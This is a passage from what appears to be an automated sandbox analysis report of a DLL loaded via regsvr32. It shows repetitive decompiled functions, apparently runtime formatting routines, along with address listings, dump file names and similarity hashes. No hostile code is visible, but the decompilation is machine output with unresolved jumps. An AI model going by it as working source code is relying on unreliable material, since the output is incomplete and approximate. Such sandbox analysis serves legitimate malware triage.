				r8b = bpl;
				if (_t140 != 8) goto 0x8001e4c0;
				0x80021f40();
				goto 0x8001e4c7;
				E00000001180020980( *((intOrPtr*)(_t129 - 8)), _t131, _t146);
				if (0 == 0) goto 0x8001e4ee;
				if ( *((intOrPtr*)(_t131 + 0x48)) == 0) goto 0x8001e4e0;
				if ( *((char*)( *((intOrPtr*)(_t131 + 0x40)))) == 0x30) goto 0x8001e4ee;
				 *((long long*)(_t131 + 0x40)) =  *((long long*)(_t131 + 0x40)) - 1;
				 *((char*)( *((intOrPtr*)(_t131 + 0x40)))) = 0x30;
				 *((intOrPtr*)(_t131 + 0x48)) =  *((intOrPtr*)(_t131 + 0x48)) + 1;
				return 1;
			}














                                                                                                              0x18001e320
                                                                                                              0x18001e325
                                                                                                              0x18001e32a
                                                                                                              0x18001e334
                                                                                                              0x18001e337
                                                                                                              0x18001e33a
                                                                                                              0x18001e33d
                                                                                                              0x18001e340
                                                                                                              0x18001e346
                                                                                                              0x18001e348
                                                                                                              0x18001e34a
                                                                                                              0x18001e353
                                                                                                              0x18001e35c
                                                                                                              0x18001e361
                                                                                                              0x18001e36a
                                                                                                              0x18001e370
                                                                                                              0x18001e378
                                                                                                              0x18001e392
                                                                                                              0x18001e397
                                                                                                              0x18001e39f
                                                                                                              0x18001e3a6
                                                                                                              0x18001e3ac
                                                                                                              0x18001e3b3
                                                                                                              0x18001e3c0
                                                                                                              0x18001e3d0
                                                                                                              0x18001e3d7
                                                                                                              0x18001e3dd
                                                                                                              0x18001e3e7
                                                                                                              0x18001e3f1
                                                                                                              0x18001e3f8
                                                                                                              0x18001e3ff
                                                                                                              0x18001e405
                                                                                                              0x18001e40a
                                                                                                              0x18001e413
                                                                                                              0x18001e41c
                                                                                                              0x18001e422
                                                                                                              0x18001e427
                                                                                                              0x18001e42b
                                                                                                              0x18001e42e
                                                                                                              0x18001e435
                                                                                                              0x18001e439
                                                                                                              0x18001e444
                                                                                                              0x18001e449
                                                                                                              0x18001e44f
                                                                                                              0x18001e456
                                                                                                              0x18001e463
                                                                                                              0x18001e46f
                                                                                                              0x18001e473
                                                                                                              0x18001e475
                                                                                                              0x18001e479
                                                                                                              0x18001e481
                                                                                                              0x18001e491
                                                                                                              0x18001e498
                                                                                                              0x18001e4a0
                                                                                                              0x18001e4a2
                                                                                                              0x18001e4a6
                                                                                                              0x18001e4aa
                                                                                                              0x18001e4b4
                                                                                                              0x18001e4b9
                                                                                                              0x18001e4be
                                                                                                              0x18001e4c2
                                                                                                              0x18001e4cf
                                                                                                              0x18001e4d5
                                                                                                              0x18001e4de
                                                                                                              0x18001e4e0
                                                                                                              0x18001e4e8
                                                                                                              0x18001e4eb
                                                                                                              0x18001e504

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6aacc586db81ae0a0afbd9b7eda649706da637c20b3e7d76e2eb89627b4c3e02
                                                                                                              • Instruction ID: f0ee276b24ddf4478f207bd2e50bf7fc4ea036e9670c8332aaad749181bbb79e
                                                                                                              • Opcode Fuzzy Hash: 6aacc586db81ae0a0afbd9b7eda649706da637c20b3e7d76e2eb89627b4c3e02
                                                                                                              • Instruction Fuzzy Hash: 82519277604E9883E7AA8F28C0583AC37A0E75AB98F148116FF4617799CF35DE49C780
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018001D528 Relevance: .1, Instructions: 137COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 37%
                                                                                                              			E0000000118001D528(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				long long _v16;
				signed long long _v24;
				intOrPtr _t84;
				signed int _t88;
				void* _t108;
				intOrPtr _t109;
				signed int _t116;
				intOrPtr _t127;
				void* _t131;
				void* _t140;
				intOrPtr _t146;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t131 = __rcx;
				bpl = __edx;
				_t84 =  *((intOrPtr*)(__rcx + 0x34));
				_t108 = _t84 - 5;
				if (_t108 > 0) goto 0x8001d60f;
				if (_t108 == 0) goto 0x8001d578;
				_t109 = _t84;
				if (_t109 == 0) goto 0x8001d663;
				if (_t109 == 0) goto 0x8001d5e7;
				if (_t109 == 0) goto 0x8001d5c0;
				if (_t109 == 0) goto 0x8001d663;
				if (_t84 - 0xffffffffffffffff != 1) goto 0x8001d62f;
				_t88 =  *(__rcx + 0x28);
				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t140;
				if ((_t88 >> 0x00000004 & 0x00000001) == 0) goto 0x8001d5aa;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001d5aa;
				 *(__rcx + 0x28) = _t88 | 0x00000040;
				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001d68e;
				 *((intOrPtr*)(__rcx + 0x30)) = 1;
				goto 0x8001d6a5;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001d5e1;
				goto 0x8001d593;
				goto 0x8001d593;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				_t116 = dil &  *(__rcx + 0x28) >> 0x00000004;
				if (_t116 == 0) goto 0x8001d609;
				goto 0x8001d593;
				goto 0x8001d593;
				if (_t116 == 0) goto 0x8001d578;
				if (_t116 == 0) goto 0x8001d578;
				if (_t116 == 0) goto 0x8001d578;
				goto 0x8001d566;
				_t127 =  *((intOrPtr*)(__rcx + 8));
				r9d = 0;
				r8d = 0;
				 *((char*)(_t127 + 0x30)) = 1;
				 *((intOrPtr*)(_t127 + 0x2c)) = 0x16;
				_v16 =  *((intOrPtr*)(__rcx + 8));
				_v24 = _v24 & 0x00000000;
				0x80013858();
				goto 0x8001d6f8;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				_t129 =  *((intOrPtr*)(__rcx + 0x18));
				if (0 == 0) goto 0x8001d686;
				_t146 =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8));
				goto 0x8001d593;
				goto 0x8001d593;
				 *(__rcx + 0x28) =  *(__rcx + 0x28) & 0xfffffff7;
				E0000000118001671C(__rcx, __rcx + 0x50,  *((intOrPtr*)(__rcx + 0x30)), _t146,  *((intOrPtr*)(__rcx + 8)));
				if (_t146 != 0) goto 0x8001d6ae;
				 *(_t131 + 0x28) =  *(_t131 + 0x28) & 0xffffffdf;
				 *((char*)(_t131 + 0x4c)) = 0;
				r8b = bpl;
				if (_t140 != 8) goto 0x8001d6c8;
				0x80021a14();
				goto 0x8001d6cf;
				E00000001180020488( *((intOrPtr*)(_t129 - 8)), _t131, _t146);
				if (0 == 0) goto 0x8001d6f6;
				if ( *((intOrPtr*)(_t131 + 0x48)) == 0) goto 0x8001d6e8;
				if ( *((char*)( *((intOrPtr*)(_t131 + 0x40)))) == 0x30) goto 0x8001d6f6;
				 *((long long*)(_t131 + 0x40)) =  *((long long*)(_t131 + 0x40)) - 1;
				 *((char*)( *((intOrPtr*)(_t131 + 0x40)))) = 0x30;
				 *((intOrPtr*)(_t131 + 0x48)) =  *((intOrPtr*)(_t131 + 0x48)) + 1;
				return 1;
			}














                                                                                                              0x18001d528
                                                                                                              0x18001d52d
                                                                                                              0x18001d532
                                                                                                              0x18001d53c
                                                                                                              0x18001d53f
                                                                                                              0x18001d542
                                                                                                              0x18001d545
                                                                                                              0x18001d548
                                                                                                              0x18001d54e
                                                                                                              0x18001d550
                                                                                                              0x18001d552
                                                                                                              0x18001d55b
                                                                                                              0x18001d564
                                                                                                              0x18001d569
                                                                                                              0x18001d572
                                                                                                              0x18001d578
                                                                                                              0x18001d580
                                                                                                              0x18001d59a
                                                                                                              0x18001d59f
                                                                                                              0x18001d5a7
                                                                                                              0x18001d5ae
                                                                                                              0x18001d5b4
                                                                                                              0x18001d5bb
                                                                                                              0x18001d5c8
                                                                                                              0x18001d5d8
                                                                                                              0x18001d5df
                                                                                                              0x18001d5e5
                                                                                                              0x18001d5ef
                                                                                                              0x18001d5f9
                                                                                                              0x18001d600
                                                                                                              0x18001d607
                                                                                                              0x18001d60d
                                                                                                              0x18001d612
                                                                                                              0x18001d61b
                                                                                                              0x18001d624
                                                                                                              0x18001d62a
                                                                                                              0x18001d62f
                                                                                                              0x18001d633
                                                                                                              0x18001d636
                                                                                                              0x18001d63d
                                                                                                              0x18001d641
                                                                                                              0x18001d64c
                                                                                                              0x18001d651
                                                                                                              0x18001d657
                                                                                                              0x18001d65e
                                                                                                              0x18001d66b
                                                                                                              0x18001d677
                                                                                                              0x18001d67b
                                                                                                              0x18001d67d
                                                                                                              0x18001d681
                                                                                                              0x18001d689
                                                                                                              0x18001d699
                                                                                                              0x18001d6a0
                                                                                                              0x18001d6a8
                                                                                                              0x18001d6aa
                                                                                                              0x18001d6ae
                                                                                                              0x18001d6b2
                                                                                                              0x18001d6bc
                                                                                                              0x18001d6c1
                                                                                                              0x18001d6c6
                                                                                                              0x18001d6ca
                                                                                                              0x18001d6d7
                                                                                                              0x18001d6dd
                                                                                                              0x18001d6e6
                                                                                                              0x18001d6e8
                                                                                                              0x18001d6f0
                                                                                                              0x18001d6f3
                                                                                                              0x18001d70c

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9f7e716a194fb443f441ab6e9ec3974d7ba7df35c1d852fb3d7d86f8768c60da
                                                                                                              • Instruction ID: f9e8c6cc9e6424f23bc967f3ef5c3d2cf37be11fc0c62b02937437d964ade371
                                                                                                              • Opcode Fuzzy Hash: 9f7e716a194fb443f441ab6e9ec3974d7ba7df35c1d852fb3d7d86f8768c60da
                                                                                                              • Instruction Fuzzy Hash: A9519E73614E1C82E7AA8F28C1543AC37A1E359B9CF25811AEF4917799CF35DE49C780
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018001E734 Relevance: .1, Instructions: 137COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 68%
                                                                                                              			E0000000118001E734(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				long long _v16;
				signed long long _v24;
				intOrPtr _t85;
				signed int _t89;
				void* _t109;
				intOrPtr _t110;
				signed int _t117;
				intOrPtr _t128;
				void* _t132;
				void* _t141;
				intOrPtr _t147;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t132 = __rcx;
				bpl = __edx;
				_t85 =  *((intOrPtr*)(__rcx + 0x34));
				_t109 = _t85 - 5;
				if (_t109 > 0) goto 0x8001e81b;
				if (_t109 == 0) goto 0x8001e784;
				_t110 = _t85;
				if (_t110 == 0) goto 0x8001e86f;
				if (_t110 == 0) goto 0x8001e7f3;
				if (_t110 == 0) goto 0x8001e7cc;
				if (_t110 == 0) goto 0x8001e86f;
				if (_t85 - 0xffffffffffffffff != 1) goto 0x8001e83b;
				_t89 =  *(__rcx + 0x28);
				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t141;
				if ((_t89 >> 0x00000004 & 0x00000001) == 0) goto 0x8001e7b6;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001e7b6;
				 *(__rcx + 0x28) = _t89 | 0x00000040;
				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001e89a;
				 *((intOrPtr*)(__rcx + 0x30)) = 1;
				goto 0x8001e8b1;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001e7ed;
				goto 0x8001e79f;
				goto 0x8001e79f;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				_t117 = dil &  *(__rcx + 0x28) >> 0x00000004;
				if (_t117 == 0) goto 0x8001e815;
				goto 0x8001e79f;
				goto 0x8001e79f;
				if (_t117 == 0) goto 0x8001e784;
				if (_t117 == 0) goto 0x8001e784;
				if (_t117 == 0) goto 0x8001e784;
				goto 0x8001e772;
				_t128 =  *((intOrPtr*)(__rcx + 8));
				r9d = 0;
				r8d = 0;
				 *((char*)(_t128 + 0x30)) = 1;
				 *((intOrPtr*)(_t128 + 0x2c)) = 0x16;
				_v16 =  *((intOrPtr*)(__rcx + 8));
				_v24 = _v24 & 0x00000000;
				0x80013858();
				goto 0x8001e904;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				_t130 =  *((intOrPtr*)(__rcx + 0x18));
				if (0 == 0) goto 0x8001e892;
				_t147 =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8));
				goto 0x8001e79f;
				goto 0x8001e79f;
				 *(__rcx + 0x28) =  *(__rcx + 0x28) & 0xfffffff7;
				E0000000118001671C(__rcx, __rcx + 0x50,  *((intOrPtr*)(__rcx + 0x30)), _t147,  *((intOrPtr*)(__rcx + 8)));
				if (_t147 != 0) goto 0x8001e8ba;
				 *(_t132 + 0x28) =  *(_t132 + 0x28) & 0xffffffdf;
				 *((char*)(_t132 + 0x4c)) = 0;
				r8b = bpl;
				if (_t141 != 8) goto 0x8001e8d4;
				E00000001180022058(_t132, _t147);
				goto 0x8001e8db;
				E00000001180020A98( *((intOrPtr*)(_t130 - 8)), _t132, _t147);
				if (0 == 0) goto 0x8001e902;
				if ( *((intOrPtr*)(_t132 + 0x48)) == 0) goto 0x8001e8f4;
				if ( *((char*)( *((intOrPtr*)(_t132 + 0x40)))) == 0x30) goto 0x8001e902;
				 *((long long*)(_t132 + 0x40)) =  *((long long*)(_t132 + 0x40)) - 1;
				 *((char*)( *((intOrPtr*)(_t132 + 0x40)))) = 0x30;
				 *((intOrPtr*)(_t132 + 0x48)) =  *((intOrPtr*)(_t132 + 0x48)) + 1;
				return 1;
			}














                                                                                                              0x18001e734
                                                                                                              0x18001e739
                                                                                                              0x18001e73e
                                                                                                              0x18001e748
                                                                                                              0x18001e74b
                                                                                                              0x18001e74e
                                                                                                              0x18001e751
                                                                                                              0x18001e754
                                                                                                              0x18001e75a
                                                                                                              0x18001e75c
                                                                                                              0x18001e75e
                                                                                                              0x18001e767
                                                                                                              0x18001e770
                                                                                                              0x18001e775
                                                                                                              0x18001e77e
                                                                                                              0x18001e784
                                                                                                              0x18001e78c
                                                                                                              0x18001e7a6
                                                                                                              0x18001e7ab
                                                                                                              0x18001e7b3
                                                                                                              0x18001e7ba
                                                                                                              0x18001e7c0
                                                                                                              0x18001e7c7
                                                                                                              0x18001e7d4
                                                                                                              0x18001e7e4
                                                                                                              0x18001e7eb
                                                                                                              0x18001e7f1
                                                                                                              0x18001e7fb
                                                                                                              0x18001e805
                                                                                                              0x18001e80c
                                                                                                              0x18001e813
                                                                                                              0x18001e819
                                                                                                              0x18001e81e
                                                                                                              0x18001e827
                                                                                                              0x18001e830
                                                                                                              0x18001e836
                                                                                                              0x18001e83b
                                                                                                              0x18001e83f
                                                                                                              0x18001e842
                                                                                                              0x18001e849
                                                                                                              0x18001e84d
                                                                                                              0x18001e858
                                                                                                              0x18001e85d
                                                                                                              0x18001e863
                                                                                                              0x18001e86a
                                                                                                              0x18001e877
                                                                                                              0x18001e883
                                                                                                              0x18001e887
                                                                                                              0x18001e889
                                                                                                              0x18001e88d
                                                                                                              0x18001e895
                                                                                                              0x18001e8a5
                                                                                                              0x18001e8ac
                                                                                                              0x18001e8b4
                                                                                                              0x18001e8b6
                                                                                                              0x18001e8ba
                                                                                                              0x18001e8be
                                                                                                              0x18001e8c8
                                                                                                              0x18001e8cd
                                                                                                              0x18001e8d2
                                                                                                              0x18001e8d6
                                                                                                              0x18001e8e3
                                                                                                              0x18001e8e9
                                                                                                              0x18001e8f2
                                                                                                              0x18001e8f4
                                                                                                              0x18001e8fc
                                                                                                              0x18001e8ff
                                                                                                              0x18001e918

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6e72771759df44cc1c3419b88e392e140b40115a0bf8839d804134319db1bd52
                                                                                                              • Instruction ID: 9907fe1db86dcda68504efcd85aabde250cf6ac038f929e21fb2c8a6a502d726
                                                                                                              • Opcode Fuzzy Hash: 6e72771759df44cc1c3419b88e392e140b40115a0bf8839d804134319db1bd52
                                                                                                              • Instruction Fuzzy Hash: 8F51A477604A9882F7AE8F28C0543BC27A1E75ABA8F148116EF49177D9CF21CE89C740
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018001E91C Relevance: .1, Instructions: 137COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 68%
                                                                                                              			E0000000118001E91C(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				long long _v16;
				signed long long _v24;
				intOrPtr _t85;
				signed int _t89;
				void* _t109;
				intOrPtr _t110;
				signed int _t117;
				intOrPtr _t128;
				void* _t132;
				void* _t141;
				intOrPtr _t147;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t132 = __rcx;
				bpl = __edx;
				_t85 =  *((intOrPtr*)(__rcx + 0x34));
				_t109 = _t85 - 5;
				if (_t109 > 0) goto 0x8001ea03;
				if (_t109 == 0) goto 0x8001e96c;
				_t110 = _t85;
				if (_t110 == 0) goto 0x8001ea57;
				if (_t110 == 0) goto 0x8001e9db;
				if (_t110 == 0) goto 0x8001e9b4;
				if (_t110 == 0) goto 0x8001ea57;
				if (_t85 - 0xffffffffffffffff != 1) goto 0x8001ea23;
				_t89 =  *(__rcx + 0x28);
				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t141;
				if ((_t89 >> 0x00000004 & 0x00000001) == 0) goto 0x8001e99e;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001e99e;
				 *(__rcx + 0x28) = _t89 | 0x00000040;
				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001ea82;
				 *((intOrPtr*)(__rcx + 0x30)) = 1;
				goto 0x8001ea99;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001e9d5;
				goto 0x8001e987;
				goto 0x8001e987;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				_t117 = dil &  *(__rcx + 0x28) >> 0x00000004;
				if (_t117 == 0) goto 0x8001e9fd;
				goto 0x8001e987;
				goto 0x8001e987;
				if (_t117 == 0) goto 0x8001e96c;
				if (_t117 == 0) goto 0x8001e96c;
				if (_t117 == 0) goto 0x8001e96c;
				goto 0x8001e95a;
				_t128 =  *((intOrPtr*)(__rcx + 8));
				r9d = 0;
				r8d = 0;
				 *((char*)(_t128 + 0x30)) = 1;
				 *((intOrPtr*)(_t128 + 0x2c)) = 0x16;
				_v16 =  *((intOrPtr*)(__rcx + 8));
				_v24 = _v24 & 0x00000000;
				0x80013858();
				goto 0x8001eaec;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				_t130 =  *((intOrPtr*)(__rcx + 0x18));
				if (0 == 0) goto 0x8001ea7a;
				_t147 =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8));
				goto 0x8001e987;
				goto 0x8001e987;
				 *(__rcx + 0x28) =  *(__rcx + 0x28) & 0xfffffff7;
				E0000000118001671C(__rcx, __rcx + 0x50,  *((intOrPtr*)(__rcx + 0x30)), _t147,  *((intOrPtr*)(__rcx + 8)));
				if (_t147 != 0) goto 0x8001eaa2;
				 *(_t132 + 0x28) =  *(_t132 + 0x28) & 0xffffffdf;
				 *((char*)(_t132 + 0x4c)) = 0;
				r8b = bpl;
				if (_t141 != 8) goto 0x8001eabc;
				E000000011800220E4(_t132, _t147);
				goto 0x8001eac3;
				E00000001180020B24( *((intOrPtr*)(_t130 - 8)), _t132, _t147);
				if (0 == 0) goto 0x8001eaea;
				if ( *((intOrPtr*)(_t132 + 0x48)) == 0) goto 0x8001eadc;
				if ( *((char*)( *((intOrPtr*)(_t132 + 0x40)))) == 0x30) goto 0x8001eaea;
				 *((long long*)(_t132 + 0x40)) =  *((long long*)(_t132 + 0x40)) - 1;
				 *((char*)( *((intOrPtr*)(_t132 + 0x40)))) = 0x30;
				 *((intOrPtr*)(_t132 + 0x48)) =  *((intOrPtr*)(_t132 + 0x48)) + 1;
				return 1;
			}














                                                                                                              0x18001e91c
                                                                                                              0x18001e921
                                                                                                              0x18001e926
                                                                                                              0x18001e930
                                                                                                              0x18001e933
                                                                                                              0x18001e936
                                                                                                              0x18001e939
                                                                                                              0x18001e93c
                                                                                                              0x18001e942
                                                                                                              0x18001e944
                                                                                                              0x18001e946
                                                                                                              0x18001e94f
                                                                                                              0x18001e958
                                                                                                              0x18001e95d
                                                                                                              0x18001e966
                                                                                                              0x18001e96c
                                                                                                              0x18001e974
                                                                                                              0x18001e98e
                                                                                                              0x18001e993
                                                                                                              0x18001e99b
                                                                                                              0x18001e9a2
                                                                                                              0x18001e9a8
                                                                                                              0x18001e9af
                                                                                                              0x18001e9bc
                                                                                                              0x18001e9cc
                                                                                                              0x18001e9d3
                                                                                                              0x18001e9d9
                                                                                                              0x18001e9e3
                                                                                                              0x18001e9ed
                                                                                                              0x18001e9f4
                                                                                                              0x18001e9fb
                                                                                                              0x18001ea01
                                                                                                              0x18001ea06
                                                                                                              0x18001ea0f
                                                                                                              0x18001ea18
                                                                                                              0x18001ea1e
                                                                                                              0x18001ea23
                                                                                                              0x18001ea27
                                                                                                              0x18001ea2a
                                                                                                              0x18001ea31
                                                                                                              0x18001ea35
                                                                                                              0x18001ea40
                                                                                                              0x18001ea45
                                                                                                              0x18001ea4b
                                                                                                              0x18001ea52
                                                                                                              0x18001ea5f
                                                                                                              0x18001ea6b
                                                                                                              0x18001ea6f
                                                                                                              0x18001ea71
                                                                                                              0x18001ea75
                                                                                                              0x18001ea7d
                                                                                                              0x18001ea8d
                                                                                                              0x18001ea94
                                                                                                              0x18001ea9c
                                                                                                              0x18001ea9e
                                                                                                              0x18001eaa2
                                                                                                              0x18001eaa6
                                                                                                              0x18001eab0
                                                                                                              0x18001eab5
                                                                                                              0x18001eaba
                                                                                                              0x18001eabe
                                                                                                              0x18001eacb
                                                                                                              0x18001ead1
                                                                                                              0x18001eada
                                                                                                              0x18001eadc
                                                                                                              0x18001eae4
                                                                                                              0x18001eae7
                                                                                                              0x18001eb00

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c2840d7ca494f3b6dc15fd42c81a430b17a2a649747a226ca5bd2571ad86daad
                                                                                                              • Instruction ID: 3589b0eebfc9bfa735f082303aa6fc6177a616d2cbeb2c6ce66e7a2b85e7c830
                                                                                                              • Opcode Fuzzy Hash: c2840d7ca494f3b6dc15fd42c81a430b17a2a649747a226ca5bd2571ad86daad
                                                                                                              • Instruction Fuzzy Hash: 7E51B173604A9882E7EE8F28C0543AC77A0F75AB98F15811AEF4517799CF21DE49C780
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018001CB18 Relevance: .1, Instructions: 137COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 37%
                                                                                                              			E0000000118001CB18(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				long long _v16;
				signed long long _v24;
				intOrPtr _t84;
				signed int _t88;
				void* _t108;
				intOrPtr _t109;
				signed int _t116;
				intOrPtr _t127;
				void* _t131;
				void* _t140;
				intOrPtr _t146;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t131 = __rcx;
				bpl = __edx;
				_t84 =  *((intOrPtr*)(__rcx + 0x34));
				_t108 = _t84 - 5;
				if (_t108 > 0) goto 0x8001cbff;
				if (_t108 == 0) goto 0x8001cb68;
				_t109 = _t84;
				if (_t109 == 0) goto 0x8001cc53;
				if (_t109 == 0) goto 0x8001cbd7;
				if (_t109 == 0) goto 0x8001cbb0;
				if (_t109 == 0) goto 0x8001cc53;
				if (_t84 - 0xffffffffffffffff != 1) goto 0x8001cc1f;
				_t88 =  *(__rcx + 0x28);
				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t140;
				if ((_t88 >> 0x00000004 & 0x00000001) == 0) goto 0x8001cb9a;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001cb9a;
				 *(__rcx + 0x28) = _t88 | 0x00000040;
				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001cc7e;
				 *((intOrPtr*)(__rcx + 0x30)) = 1;
				goto 0x8001cc95;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001cbd1;
				goto 0x8001cb83;
				goto 0x8001cb83;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				_t116 = dil &  *(__rcx + 0x28) >> 0x00000004;
				if (_t116 == 0) goto 0x8001cbf9;
				goto 0x8001cb83;
				goto 0x8001cb83;
				if (_t116 == 0) goto 0x8001cb68;
				if (_t116 == 0) goto 0x8001cb68;
				if (_t116 == 0) goto 0x8001cb68;
				goto 0x8001cb56;
				_t127 =  *((intOrPtr*)(__rcx + 8));
				r9d = 0;
				r8d = 0;
				 *((char*)(_t127 + 0x30)) = 1;
				 *((intOrPtr*)(_t127 + 0x2c)) = 0x16;
